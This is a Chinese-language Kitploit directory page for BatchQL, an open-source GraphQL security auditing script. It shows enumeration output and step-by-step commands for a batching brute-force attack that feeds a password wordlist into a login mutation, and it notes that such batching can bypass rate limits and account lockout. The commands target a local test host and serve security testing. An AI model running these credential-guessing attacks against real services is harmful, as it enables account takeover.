Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
batchql — GraphQL 安全审计脚本,专注于执行批量 GraphQL 查询与变更 | Kitploit
工具/GitHubGitHub/assetnote/batchql
漏洞扫描器API安全测试Web安全渗透测试
GitHubassetnote/batchql

batchql

GraphQL 安全审计脚本,专注于执行批量 GraphQL 查询与变更

查看仓库网站
41342265年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

BatchQL

BatchQL 是一个专注于执行批量 GraphQL 查询和变更的 GraphQL 安全审计脚本。该脚本并不复杂,我们欢迎改进。

在探索 GraphQL 批量攻击的问题空间时,我们发现互联网上有一些博客文章,但缺乏用于执行 GraphQL 批量攻击的工具。

根据所实现的功能,GraphQL 批量攻击可能相当严重。例如,假设有一个密码重置功能,需要输入发送到您邮箱的 4 位数 PIN。使用此工具,您可以在单个 GraphQL 查询中尝试所有 10,000 个 PIN 尝试。根据密码重置流程的实现细节,这可能会绕过任何速率限制或帐户锁定。

检测

该工具能够检测以下内容:

  • 内省查询支持
  • 模式建议检测
  • 潜在 CSRF 检测
  • 基于查询名称的批量处理
  • 基于查询 JSON 列表的批量处理

攻击

目前,该工具仅支持发送基于 JSON 列表的查询以进行批量攻击。它支持变量嵌入在查询中或通过 JSON 输入提供的场景。

用法

枚举

root@kitploit:~
❯ python batch.py -e http://re.local:5000/graphiql -p localhost:8080

Schema suggestions enabled. Use Clairvoyance to recover schema: https://github.com/nikitastupin/clairvoyance
CSRF GET based successful. Please confirm that this is a valid issue.
CSRF POST based successful. Please confirm that this is a valid issue.
Query name based batching: GraphQL batching is possible... preflight request was successful.
Query JSON list based batching: GraphQL batching is possible... preflight request was successful.
Most provide query, wordlist, and size to perform batching attack.

批量攻击

  1. 保存一个包含你的 GraphQL 查询的文件,例如 acc-login.txt:
root@kitploit:~
mutation emailLoginRemembered($loginInput: InputRememberedEmailLogin!) {
  emailLoginRemembered(loginInput: $loginInput) {
    authToken {
      accessToken
      __typename
    }
    userSessionResponse {
      userToken
      userIdentity {
        userId
        identityType
        verified
        onboardingStatus
        registrationReferralCode
        userReferralInfo {
          referralCode {
            code
            valid
            __typename
          }
          __typename
        }
        __typename
      }
      __typename
    }
    __typename
  }
  }
  1. 运行以下命令来执行 GraphQL 批量攻击:
root@kitploit:~
❯ python batch.py --query acc-login.txt --wordlist passwords.txt -v '{"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}' --size 100 -e http://re.local:5000/graphiql -p localhost:8080

上述命令执行以下操作:

  • 从本地文件指定查询 --query acc-login.txt
  • 指定单词列表 --wordlist passwords.txt
  • 通过替换标识符指定变量输入 -v {"loginInput":{"email":"[email protected]","password":"#VARIABLE#","rememberMe":false}}
  • 指定批量大小 --size 100
  • 指定端点 -e http://re.local:5000/graphiql
  • 指定代理 -p localhost:8080

参考

  • Exploiting GraphQL
  • Damn Vulnerable GraphQL Application
  • GraphQL Batching Attack - Wallarm
  • 缓解批量攻击
下载工具